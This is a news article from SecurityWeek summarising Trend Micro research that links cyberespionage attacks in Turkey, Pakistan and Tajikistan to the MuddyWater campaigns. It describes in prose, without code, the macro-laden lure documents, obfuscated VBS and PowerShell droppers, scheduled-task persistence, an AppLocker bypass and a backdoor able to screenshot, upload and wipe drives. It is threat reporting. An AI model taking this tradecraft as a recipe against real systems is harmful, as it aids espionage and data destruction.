Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cybercrime

New Cyberespionage Attacks Linked to MuddyWater Campaign

Recent attacks targeting organizations in Turkey, Pakistan and Tajikistan appear to be linked to the previously detailed MuddyWater campaigns, according to Trend Micro.

Recent attacks targeting organizations in Turkey, Pakistan and Tajikistan appear to be linked to the previously detailed MuddyWater campaigns, according to Trend Micro.

The MuddyWater campaigns were named so because of a high level of confusion they managed to create, thus making it difficult to attribute to a specific actor. Artifacts associated with MuddyWater, however, were used in attacks targeting the Saudi Arabian government, in assaults linked to a single attack framework last year, and in incidents attributed to the hacking group FIN7.

Based on the targeted organizations and the focus on gathering of information and upload it to the command and control (C&C) servers, the actors behind these attacks appear mainly focused on espionage activities, Trend Micro says.

The newly observed attacks feature numerous ties to the previously observed MuddyWater campaigns and also show that “the attackers are not merely interested in a one-off campaign, but will likely continue to perform cyberespionage activities against the targeted countries and industries,” the security firm notes.

Similarities with earlier MuddyWater campaigns include the focus on targets in the Middle East, the use of documents that try to mimic government organizations, the dropping of a Visual Basic file and a Powershell file (the VBS executes the PS), and the use of hundreds of hacked websites as proxies.

Furthermore, the attacks show similar obfuscation processes and internal variables after deobfuscation, Trend Micro says.

Malicious documents targeting individuals working for government organizations and telecommunication companies in Tajikistan use engineering to trick victims into enabling macros. Some of the payloads were embedded inside the document itself, while others were downloaded from the Internet.

After the macros are enabled, the Visual Basic script and PowerShell script, both obfuscated, are dropped in the ProgramData directory. A scheduled task is created with the path to the VBS script to ensure persistence.

Advertisement. Scroll to continue reading.

As part of other attacks, the second file dropped is a base64 encoded text file that results in the Powershell file after decoding. Another campaign would drop three files: an .sct scriptlet file, an .inf file, and a base64 encoded data file. The first two use publicly available code to bypass applocker.

The PowerShell script is divided into three parts: one contains global variables (paths, encryption keys, a list of gates and hacked websites used as proxies), the second contains functions related to standard RSA encryption, and the third contains a backdoor function.

The backdoor collects machine information, takes screenshots, and sends all data to the C&C. It also includes support for commands such as clean (attempts to delete all items from drives C, D, E, and F), reboot, shutdown, screenshot, and upload. Communication with the C&C is performed via XML messages.

“It seems that the attackers are actively monitoring the incoming connections to the C&C. In one of our attempts, we sent an improper request to the C&C server, which replied with the following message: ‘Stop!!! I Kill You Researcher.’ This level of personalized messaging implies that the attackers are monitoring what data is going to and from their C&C server,” Trend Micro explained.

The security researchers also discovered what appears to be a false flag in the PowerShell script. If the communication with the C&C fails and the PowerShell script is run from a command line, error messages written in simplified Mandarin Chinese are displayed. The messages appear machine-translated rather than written by a native speaker, Trend’s researchers point out.

Related: Middle East
‘MuddyWater’ Attacks Difficult to Clear Up

Related: Recent Fileless Attacks Linked to Single Framework, Researchers Say

Written By

Ionut Arghire is an international correspondent for SecurityWeek.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Cybercrime

The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Cybercrime

A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

Cybercrime

As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.

Cybercrime

Luxury retailer Neiman Marcus Group informed some customers last week that their online accounts had been breached by hackers.

Cybercrime

Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.

Cybercrime

Patch Tuesday: Microsoft calls attention to a series of zero-day remote code execution attacks hitting its Office productivity suite.

Artificial Intelligence

The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.

Cybercrime

Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.